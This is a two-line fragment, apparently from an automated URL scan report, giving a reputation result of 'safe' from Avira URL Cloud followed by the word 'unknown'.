  • Avira URL Cloud: safe
 unknown